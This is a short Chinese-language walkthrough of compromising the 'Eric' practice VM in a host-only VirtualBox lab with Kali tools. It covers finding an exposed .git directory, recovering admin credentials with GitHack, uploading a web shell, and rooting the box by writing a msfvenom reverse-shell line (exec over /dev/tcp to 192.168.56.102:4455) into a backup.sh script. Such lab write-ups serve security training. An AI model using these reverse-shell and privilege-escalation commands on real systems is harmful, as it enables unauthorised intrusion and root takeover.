利用kali对Eric靶机渗透
刚开始用kali扫描virtualbox网段发现扫描不到靶机,百度说是要更改网络设置
于是进行网络设置,选为仅主机(Host-Only)网络
再次使用kali进行扫描主机所在c段网络
发现开放了一个80端口,对这个端口所在网段进行扫描
扫描发现一个.git文件
使用kali自带的目录遍历工具dirb,便利端口网段
发现admin.php文件,在浏览器中打开,发现是一个登录界面
使用githack工具获取admin.php文件内容
打开admin.php文件获得账号和密码
登录后得到一个有更多登录项的界面
随意填写表,上传一个shell
进入upload的目录,得到第一个flag
cd /home ls -al cd eric ls -al cat flag.txt
利用backup.sh文件来提权到root,创建了一个msfvenom脚本
msfvenom -p cmd/unix/reverse_bash lhost=192.168.56.102 lport=4455 R
复制脚本内容,然后切换到靶机的shell会话中,使用echo命令,将内容写入到backup.sh中
echo "0<&129-;exec 129<>/dev/tcp/192.168.56.102/4455;sh <&129 >&129 2>&129" > backup.sh
cat backup.sh
打开一个新的终端,再创建另外一个nc监听器,监听的端口就是刚才使用msfvenom创建脚本时的端口,4455。接着,我们执行一下这个backup.sh文件,马上就获得了一个root shell。我们还是需要使用Python语句来进入到系统的shell中。接着,我们切换到root目录下,看到了root flag

浙公网安备 33010602011771号